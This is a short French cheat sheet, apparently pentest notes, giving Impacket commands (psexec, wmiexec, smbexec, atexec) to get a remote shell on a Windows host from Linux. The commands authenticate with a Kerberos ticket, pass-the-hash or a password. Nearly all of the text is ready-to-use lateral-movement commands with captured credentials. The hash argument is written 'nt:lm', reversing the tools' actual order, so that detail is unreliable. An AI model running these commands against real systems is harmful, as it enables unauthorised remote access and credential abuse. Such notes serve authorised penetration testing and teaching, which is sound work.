Quatre outils d'Impacket pour obtenir un shell distant sur une machine Windows depuis Linux : **psexec** (le plus connu, dépose un service), **wmiexec** (via WMI, plus discret), **smbexec** (alternative SMB), **atexec** (via le scheduler). Couvre les trois modes d'authentification : mot de passe, hash NTLM (pass-the-hash), ou ticket [[Kerberos]].
### PsExec
#### Avec un TGS
```bash
export KRB5CCNAME=truc.ccache
impacket-psexec -k -no-pass $domain/$user@$target
```
#### Avec un hash
```bash
impacket-psexec $domain/$user@$target -hashes nt:lm
```
#### Avec password
```bash
impacket-psexec $domain/$user@$target
```
---
### WmiExec
#### Avec un TGS
```bash
export KRB5CCNAME=truc.ccache
impacket-wmiexec -k -no-pass $domain/$user@$target
```
#### Avec un hash
```bash
impacket-wmiexec $domain/$user@$target -hashes nt:lm
```
#### Avec password
```bash
impacket-wmiexec $domain/$user@$target
```
---
### SmbExec
#### Avec un TGS
```bash
export KRB5CCNAME=truc.ccache
impacket-smbexec -k -no-pass $domain/$user@$target
```
#### Avec un hash
```bash
impacket-smbexec $domain/$user@$target -hashes nt:lm
```
#### Avec password
```bash
impacket-smbexec $domain/$user@$target
```
---
### AtExec
#### Avec un TGS
```bash
export KRB5CCNAME=truc.ccache
impacket-atexec -k -no-pass $domain/$user@$target $command
```
#### Avec un hash
```bash
impacket-atexec $domain/$user@$target -hashes nt:lm $command
```
#### Avec password
```bash
impacket-atexec $domain/$user@$target $command
```